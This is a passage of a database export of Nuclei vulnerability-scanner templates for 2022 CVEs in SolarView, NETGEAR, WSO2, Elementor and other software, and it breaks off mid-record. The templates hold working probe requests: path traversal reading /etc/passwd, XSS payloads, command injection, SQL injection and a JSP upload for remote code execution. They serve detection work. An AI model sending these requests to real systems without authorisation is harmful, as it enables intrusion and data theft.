GET\n path:\n - \"{{BaseURL}}/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022078d081edda1941e7be81d051567065c4e396282660f623323433ef782d79da2902205556917e13179bce84c0fd7d72192302ad7189776bf60aa56d15335d18521f44:922c64590222798bb761d5b6d8e72950", "hash": "90fd79a845b302f072eb091339ebb2cd", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30850d" }, "name": "CVE-2022-29299.yaml", "content": "id: CVE-2022-29299\n\ninfo:\n name: SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting\n author: For3stCo1d\n severity: medium\n description: |\n SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'time_begin' parameter to Solar_History.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts.\n reference:\n - https://www.exploit-db.com/exploits/50967\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29299\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cve-id: CVE-2022-29299\n epss-score: 0.00175\n epss-percentile: 0.53704\n metadata:\n verified: true\n max-request: 1\n shodan-query: http.favicon.hash:-244067125\n tags: cve2022,cve,xss,solarview,edb\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '<\"\">'\n - '/Solar_History.php\" METHOD=\"post\">'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450220673dc09a9e66945d3637df5b363f262144bea056b46b6df86841bfd376ae1c290221008cbc66ea88991d111c727cdec2f06797a521103da95bc92272406df8e87890a5:922c64590222798bb761d5b6d8e72950", "hash": "c471301011d14427a7fdb95c9ece3be7", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30850e" }, "name": "CVE-2022-29301.yaml", "content": "id: CVE-2022-29301\n\ninfo:\n name: SolarView Compact 6.00 - 'pow' Cross-Site Scripting\n author: For3stCo1d\n severity: high\n description: |\n SolarView Compact version 6.00 contains a cross-site scripting vulnerability in the 'pow' parameter to Solar_SlideSub.php.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest patch or upgrade to a non-vulnerable version of SolarView Compact.\n reference:\n - https://www.exploit-db.com/exploits/50968\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29301\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cve-id: CVE-2022-29301\n metadata:\n verified: true\n max-request: 1\n shodan-query: http.favicon.hash:-244067125\n tags: cve,cve2022,xss,solarview,edb\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '<\"\">'\n - 'SolarView'\n condition: and\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4b0a00483046022100d38ffbd6542c292bb1f0cc27a0f800b5723872c60c562f22a60f1da6b998c8d5022100a20ec0c2ea61b699dd97b70ca196faf415a635099331772a14498dcbac2b3839:922c64590222798bb761d5b6d8e72950", "hash": "a575bfc66124c5996ecddc4a840c0479", "level": 5, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf30850f" }, "name": "CVE-2022-29303.yaml", "content": "id: CVE-2022-29303\n\ninfo:\n name: SolarView Compact 6.00 - OS Command Injection\n author: badboycxcc\n severity: critical\n description: |\n SolarView Compact 6.00 was discovered to contain a command injection vulnerability via conf_mail.php.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the system.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the OS command injection vulnerability in SolarView Compact 6.00.\n reference:\n - https://www.exploit-db.com/exploits/50940\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29303\n - https://drive.google.com/drive/folders/1tGr-WExbpfvhRg31XCoaZOFLWyt3r60g?usp=sharing\n - http://packetstormsecurity.com/files/167183/SolarView-Compact-6.0-Command-Injection.html\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-29303\n cwe-id: CWE-78\n epss-score: 0.9598\n epss-percentile: 0.99429\n cpe: cpe:2.3:o:contec:sv-cpt-mc310_firmware:6.00:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: contec\n product: sv-cpt-mc310_firmware\n shodan-query: http.html:\"SolarView Compact\"\n tags: cve,cve2022,injection,solarview,edb,packetstorm,rce,kev,contec\nvariables:\n cmd: \"cat${IFS}/etc/passwd\"\n\nhttp:\n - raw:\n - |\n @timeout: 25s\n POST /conf_mail.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n mail_address=%3B{{cmd}}%3B&button=%83%81%81%5B%83%8B%91%97%90M\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0\"\n\n - type: word\n part: body\n words:\n - \"p1_network_mail.cgi\"\n# digest: 4a0a00473045022100cfdae160b8d20debb49ab77a03efc5984e3595e0738b0153de27449eb8cf254c022008bf10a1ac0f9b524841d022daae36b4b0b105ddae1296e300fb87c886200617:922c64590222798bb761d5b6d8e72950", "hash": "538e0d117ca3f4678a806a46decbb9f7", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308510" }, "name": "CVE-2022-29349.yaml", "content": "id: CVE-2022-29349\n\ninfo:\n name: kkFileView 4.0.0 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n kkFileView 4.0.0 contains multiple cross-site scripting vulnerabilities via the urls and currentUrl parameters at /controller/OnlinePreviewController.java.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest security patch or upgrade to a newer version of kkFileView to mitigate the XSS vulnerability.\n reference:\n - https://github.com/kekingcn/kkFileView/issues/347\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29349\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-29349\n cwe-id: CWE-79\n epss-score: 0.01698\n epss-percentile: 0.86444\n cpe: cpe:2.3:a:keking:kkfileview:4.0.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: keking\n product: kkfileview\n shodan-query: http.html:\"kkFileView\"\n tags: cve,cve2022,kkFileView,xss,keking\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/onlinePreview?url=aHR0cDovL3d3dy54eHguY29tL3h4eC50eHQiPjxpbWcgc3JjPTExMSBvbmVycm9yPWFsZXJ0KDEpPjEyMw%3D%3D\"\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'txt\">123'\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a004730450221008ef58e2fe8d3135a84c8de1c0e8768da7b5e0d6b8ad3771ae9495f44cdff423302201139897fc4641b2c9df1965cd6cefb0377632f5366b8f0e0c20be07316136cf0:922c64590222798bb761d5b6d8e72950", "hash": "4ba768ce756f1a0150be83eaf6a1e333", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308511" }, "name": "CVE-2022-29383.yaml", "content": "id: CVE-2022-29383\n\ninfo:\n name: NETGEAR ProSafe SSL VPN firmware - SQL Injection\n author: elitebaz\n severity: critical\n description: |\n NETGEAR ProSafe SSL VPN multiple firmware versions were discovered to contain a SQL injection vulnerability via USERDBDomains.Domainname at cgi-bin/platform.cgi.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL commands, potentially leading to unauthorized access, data leakage, or denial of service.\n remediation: |\n Apply the latest firmware update provided by NETGEAR to mitigate this vulnerability.\n reference:\n - http://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29383\n - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222-CVE-2022-29383\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29383\n - https://github.com/badboycxcc/Netgear-ssl-vpn-20211222\n - https://www.netgear.com/about/security/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-29383\n cwe-id: CWE-89\n epss-score: 0.39819\n epss-percentile: 0.9716\n cpe: cpe:2.3:o:netgear:ssl312_firmware:fvs336gv2:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: netgear\n product: ssl312_firmware\n tags: cve2022,cve,sqli,netgear,router\n\nhttp:\n - raw:\n - |\n POST /scgi-bin/platform.cgi HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=utf-8\n\n thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5435'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n - |\n POST /scgi-bin/platform.cgi HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded; charset=utf-8\n\n thispage=index.htm&USERDBUsers.UserName=NjVI&USERDBUsers.Password=&USERDBDomains.Domainname=geardomain'+AND+'5434'%3d'5434'+AND+'MwLj'%3d'MwLj&button.login.USERDBUsers.router_status=Login&Login.userAgent=MDpd\n\n matchers:\n - type: dsl\n dsl:\n - contains(body_1, \"User authentication Failed\")\n - contains(body_2, \"User Login Failed for SSLVPN User.\")\n condition: and\n# digest: 4a0a00473045022100f45d3739c471c0247ab5ddaef54f66b34aa714db5eed11fca164bde53a9d21d502207dba6b386eb95fb5189116296ed35657baa078f1332abcdf1f821b72666ba758:922c64590222798bb761d5b6d8e72950", "hash": "b26ab513fa8da58e7c336cb3c831f251", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308512" }, "name": "CVE-2022-29455.yaml", "content": "id: CVE-2022-29455\n\ninfo:\n name: WordPress Elementor Website Builder <= 3.5.5 - DOM Cross-Site Scripting\n author: rotembar,daffainfo\n severity: medium\n description: |\n WordPress Elementor Website Builder plugin 3.5.5 and prior contains a reflected cross-site scripting vulnerability via the document object model.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade WordPress Elementor Website Builder to version 3.5.6 or later to mitigate this vulnerability.\n reference:\n - https://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor\n - https://www.rotem-bar.com/elementor\n - https://patchstack.com/database/vulnerability/elementor/wordpress-elementor-plugin-3-5-5-unauthenticated-dom-based-reflected-cross-site-scripting-xss-vulnerability\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29455\n - https://wordpress.org/plugins/elementor/#developers\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-29455\n cwe-id: CWE-79\n epss-score: 0.0019\n epss-percentile: 0.56534\n cpe: cpe:2.3:a:elementor:website_builder:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: elementor\n product: website_builder\n framework: wordpress\n tags: cve,cve2022,xss,wordpress,elementor\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/wp-content/plugins/elementor/readme.txt'\n\n matchers-condition: and\n matchers:\n - type: dsl\n dsl:\n - compare_versions(version, '<= 3.5.5')\n\n - type: word\n part: body\n words:\n - 'Elementor Website Builder'\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: version\n group: 1\n regex:\n - \"(?m)Stable tag: ([0-9.]+)\"\n internal: true\n\n - type: regex\n group: 1\n regex:\n - \"(?m)Stable tag: ([0-9.]+)\"\n# digest: 4a0a004730450220132dd18822d4be6e55b83dc3418190c6b99196da5fe45f1cb6830726664d2f5a022100b9c8cb73aa892d6d0e8a18f869dc632c2795411bb3c62c508306024a87fb2fb9:922c64590222798bb761d5b6d8e72950", "hash": "60950433a0c72a931c505095f2384b36", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308513" }, "name": "CVE-2022-29464.yaml", "content": "id: CVE-2022-29464\n\ninfo:\n name: WSO2 Management - Arbitrary File Upload & Remote Code Execution\n author: luci,dhiyaneshDk\n severity: critical\n description: |\n Certain WSO2 products allow unrestricted file upload with resultant remote code execution. This affects WSO2 API Manager 2.2.0 and above through 4.0.0; WSO2 Identity Server 5.2.0 and above through 5.11.0; WSO2 Identity Server Analytics 5.4.0, 5.4.1, 5.5.0, and 5.6.0; WSO2 Identity Server as Key Manager 5.3.0 and above through 5.10.0; and WSO2 Enterprise Integrator 6.2.0 and above through 6.6.0.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to upload malicious files and execute arbitrary code on the affected system.\n remediation: |\n Apply the latest security patches and updates provided by WSO2 to mitigate this vulnerability.\n reference:\n - https://shanesec.github.io/2022/04/21/Wso2-Vul-Analysis-cve-2022-29464/\n - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1738\n - https://github.com/hakivvi/CVE-2022-29464\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29464\n - http://www.openwall.com/lists/oss-security/2022/04/22/7\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-29464\n cwe-id: CWE-22\n epss-score: 0.97146\n epss-percentile: 0.99783\n cpe: cpe:2.3:a:wso2:api_manager:*:*:*:*:*:*:*:*\n metadata:\n max-request: 2\n vendor: wso2\n product: api_manager\n shodan-query: http.favicon.hash:1398055326\n tags: cve,cve2022,rce,fileupload,wso2,intrusive,kev\n\nhttp:\n - raw:\n - |\n POST /fileupload/toolsAny HTTP/1.1\n Host: {{Hostname}}\n Content-Type: multipart/form-data; boundary=---------------------------250033711231076532771336998311\n Content-Length: 348\n\n -----------------------------250033711231076532771336998311\n Content-Disposition: form-data; name=\"../../../../repository/deployment/server/webapps/authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp\";filename=\"test.jsp\"\n Content-Type: application/octet-stream\n\n <% out.print(\"WSO2-RCE-CVE-2022-29464\"); %>\n -----------------------------250033711231076532771336998311--\n - |\n GET /authenticationendpoint/{{to_lower(\"{{randstr}}\")}}.jsp HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - \"contains(body_2, 'WSO2-RCE-CVE-2022-29464')\"\n# digest: 4a0a0047304502206626d39352045dab0703dbd61d9cecafd6e7f18e8d9316bef52d936ca126b399022100d448de4461fe4835998a05ef187668142f89f7025b11abe66e0e3305508c1171:922c64590222798bb761d5b6d8e72950", "hash": "7d919754eff31c7de9066f19b893908d", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308514" }, "name": "CVE-2022-29548.yaml", "content": "id: CVE-2022-29548\n\ninfo:\n name: WSO2 - Cross-Site Scripting\n author: edoardottt\n severity: medium\n description: |\n WSO2 contains a reflected cross-site scripting vulnerability in the Management Console of API Manager 2.2.0, 2.5.0, 2.6.0, 3.0.0, 3.1.0, 3.2.0, and 4.0.0; API Manager Analytics 2.2.0, 2.5.0, and 2.6.0; API Microgateway 2.2.0; Data Analytics Server 3.2.0; Enterprise Integrator 6.2.0, 6.3.0, 6.4.0, 6.5.0, and 6.6.0; IS as Key Manager 5.5.0, 5.6.0, 5.7.0, 5.9.0, and 5.10.0; Identity Server 5.5.0, 5.6.0, 5.7.0, 5.9.0, 5.10.0, and 5.11.0; Identity Server Analytics 5.5.0 and 5.6.0; and WSO2 Micro Integrator 1.0.0.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.\n remediation: |\n Apply the latest security patches or updates provided by WSO2 to fix the XSS vulnerability.\n reference:\n - https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1603\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29548\n - http://packetstormsecurity.com/files/167587/WSO2-Management-Console-Cross-Site-Scripting.html\n - https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2022/WSO2-2021-1603/\n - https://github.com/vishnusomank/GoXploitDB\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-29548\n cwe-id: CWE-79\n epss-score: 0.00299\n epss-percentile: 0.68867\n cpe: cpe:2.3:a:wso2:api_manager:2.2.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wso2\n product: api_manager\n google-query: inurl:\"carbon/admin/login\"\n tags: cve,cve2022,wso2,xss,packetstorm\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/carbon/admin/login.jsp?loginStatus=false&errorCode=%27);alert(document.domain)//\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"CARBON.showWarningDialog('???');alert(document.domain)//???\"\n\n - type: word\n part: header\n words:\n - \"text/html\"\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100f74f191103aed5a55a87b64ed54d8e3f2c3a84f48f2853428d9af571e0cd877702201a9a8a865260835250bcde79a6d3fd03166539ac2f673fd0a73386d219f510e2:922c64590222798bb761d5b6d8e72950", "hash": "e20646d6875b0fa1ea983a9b5ea74b2a", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308515" }, "name": "CVE-2022-29775.yaml", "content": "id: CVE-2022-29775\n\ninfo:\n name: iSpy 7.2.2.0 - Authentication Bypass\n author: arafatansari\n severity: critical\n description: |\n iSpy 7.2.2.0 contains an authentication bypass vulnerability. An attacker can craft a URL and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information and potential compromise of the system.\n remediation: |\n Upgrade to the latest version of iSpy (7.2.2.1 or higher) which includes a fix for the authentication bypass vulnerability.\n reference:\n - https://gist.github.com/securylight/79f673aa3a453c80c0e78f356a8f650b\n - https://github.com/securylight/CVES_write_ups/blob/main/iSpy_connect.pdf\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=2022-29775\n - https://nvd.nist.gov/vuln/detail/CVE-2022-29775\n - https://github.com/securylight/CVES_write_ups\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-29775\n cwe-id: CWE-287\n epss-score: 0.01088\n epss-percentile: 0.82745\n cpe: cpe:2.3:a:ispyconnect:ispy:7.2.2.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: ispyconnect\n product: ispy\n shodan-query: http.html:\"iSpy is running\"\n tags: cve,cve2022,ispy,auth-bypass,ispyconnect\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/logfile?d=crossdomain.xml'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Log Start'\n - 'Log File'\n - 'iSpy'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402202266b24b3ca73622ae1a9a90ed2ca8a2800fd51395203f79212cca3efcca657c022072817838ecc6d8bcfbefc1ed8b599b073956b1ea37fbd0821541a08b1e56798d:922c64590222798bb761d5b6d8e72950", "hash": "c94e98b3f61865ed6a1a1a965258ca8d", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308516" }, "name": "CVE-2022-30073.yaml", "content": "id: CVE-2022-30073\n\ninfo:\n name: WBCE CMS 1.5.2 - Cross-Site Scripting\n author: arafatansari\n severity: medium\n description: |\n WBCE CMS 1.5.2 contains a stored cross-site scripting vulnerability via \\admin\\user\\save.php Display Name parameters.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.\n remediation: |\n Upgrade to a patched version of WBCE CMS or apply the vendor-supplied patch to mitigate this vulnerability.\n reference:\n - https://github.com/APTX-4879/CVE\n - https://github.com/APTX-4879/CVE/blob/main/CVE-2022-30073.pdf\n - https://nvd.nist.gov/vuln/detail/CVE-2022-30073\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 5.4\n cve-id: CVE-2022-30073\n cwe-id: CWE-79\n epss-score: 0.00205\n epss-percentile: 0.57793\n cpe: cpe:2.3:a:wbce:wbce_cms:1.5.2:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 4\n vendor: wbce\n product: wbce_cms\n tags: cve2022,cve,wbcecms,xss,wbce\n\nhttp:\n - raw:\n - |\n POST /admin/login/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n url=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login\n - |\n GET /admin/users/index.php HTTP/1.1\n Host: {{Hostname}}\n - |\n POST /admin/users/index.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n formtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=testme2&password=temp1234&password2=temp1234&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=testme2%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=\n - |\n GET /admin/users/index.php HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - \"

    \"\n - \"WBCECMS\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n name: formtoken\n group: 1\n regex:\n - ''\n internal: true\n part: body\n# digest: 4a0a00473045022008a3770822e57b09d41ac02e4e8fb24a8d4ae12e02479ea7fba6c5a50919789a022100e7d5afd4414fd130081f474df96ee4a0f3b609a7d5e683b618acba7031af8323:922c64590222798bb761d5b6d8e72950", "hash": "321dba3ea2302471383fb04b3cfeacce", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308517" }, "name": "CVE-2022-30489.yaml", "content": "id: CVE-2022-30489\n\ninfo:\n name: Wavlink WN-535G3 - Cross-Site Scripting\n author: For3stCo1d\n severity: medium\n description: |\n Wavlink WN-535G3 contains a POST cross-site scripting vulnerability via the hostname parameter at /cgi-bin/login.cgi.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Apply the latest firmware update provided by the vendor to mitigate this vulnerability.\n reference:\n - https://github.com/badboycxcc/XSS-CVE-2022-30489\n - https://github.com/badboycxcc/XSS\n - https://nvd.nist.gov/vuln/detail/CVE-2022-30489\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-30489\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36947\n cpe: cpe:2.3:o:wavlink:wn535g3_firmware:-:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: wavlink\n product: wn535g3_firmware\n shodan-query: http.title:\"Wi-Fi APP Login\"\n tags: cve,cve2022,xss,wavlink,router,iot\n\nhttp:\n - raw:\n - |\n POST /cgi-bin/login.cgi HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n newUI=1&page=login&username=admin&langChange=0&ipaddr=x.x.x.x&login_page=login.shtml&homepage=main.shtml&sysinitpage=sysinit.shtml&hostname=\")&key=M27234733&password=63a36bceec2d3bba30d8611c323f4cda&lang_=cn\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - ''\n - 'parent.location.replace(\"http://\")'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100e403fa95c8208dca72c7387425cba8c129e7dfa20d8dab4a96911b406fba2cc1022048e179973aa2f40b253ff07bb159c86d5da40b59437535549c3ee912cc28f201:922c64590222798bb761d5b6d8e72950", "hash": "4b6d48932ef28755d022b2ff60b33e8c", "level": 4, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308518" }, "name": "CVE-2022-30512.yaml", "content": "id: CVE-2022-30512\n\ninfo:\n name: School Dormitory Management System 1.0 - SQL Injection\n author: tess\n severity: critical\n description: |\n School Dormitory Management System 1.0 contains a SQL injection vulnerability via accounts/payment_history.php:31. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.\n remediation: |\n Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the School Dormitory Management System 1.0.\n reference:\n - https://github.com/bigzooooz/CVE-2022-30512\n - https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-30512\n - https://github.com/SYRTI/POC_to_review\n - https://github.com/WhooAmii/POC_to_review\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2022-30512\n cwe-id: CWE-89\n epss-score: 0.02624\n epss-percentile: 0.89288\n cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 1\n vendor: school_dormitory_management_system_project\n product: school_dormitory_management_system\n tags: cve,cve2022,sqli,school_dormitory_management_system_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/dms/admin/accounts/payment_history.php?account_id=2%27'\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'Fatal error'\n - 'Uncaught Error: Call to a member function fetch_assoc()'\n - 'Month of'\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502206d4c2cf954be9043250ab16a537e7ef2675f66c8ba097f50d00faccf56e535f5022100921f7c12c1750864df6c558bcfbaf3b6796d0eeba2782990b6e5755840d26fe0:922c64590222798bb761d5b6d8e72950", "hash": "18b430a42406b93e5abbc6a692b94424", "level": 6, "time": "2024-05-17 23:39:45" }, { "_id": { "$oid": "66477a413521042ccf308519" }, "name": "CVE-2022-30513.yaml", "content": "id: CVE-2022-30513\n\ninfo:\n name: School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting\n author: tess\n severity: medium\n description: |\n School Dormitory Management System 1.0 contains an authenticated cross-site scripting vulnerability via admin/inc/navigation.php:125. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n impact: |\n Successful exploitation of this vulnerability could allow an authenticated attacker to inject malicious scripts into the application, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to the latest version to mitigate this vulnerability.\n reference:\n - https://github.com/bigzooooz/CVE-2022-30513\n - https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html\n - https://nvd.nist.gov/vuln/detail/CVE-2022-30513\n - https://github.com/nomi-sec/PoC-in-GitHub\n - https://github.com/trhacknon/Pocingit\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2022-30513\n cwe-id: CWE-79\n epss-score: 0.00097\n epss-percentile: 0.39401\n cpe: cpe:2.3:a:school_dormitory_management_system_project:school_dormitory_management_system:1.0:*:*:*:*:*:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: school_dormitory_management_system_project\n product: school_dormitory_management_system\n tags: cve2022,cve,xss,authenticated,school_dormitory_management_system_project\n\nhttp:\n - raw:\n - |\n POST 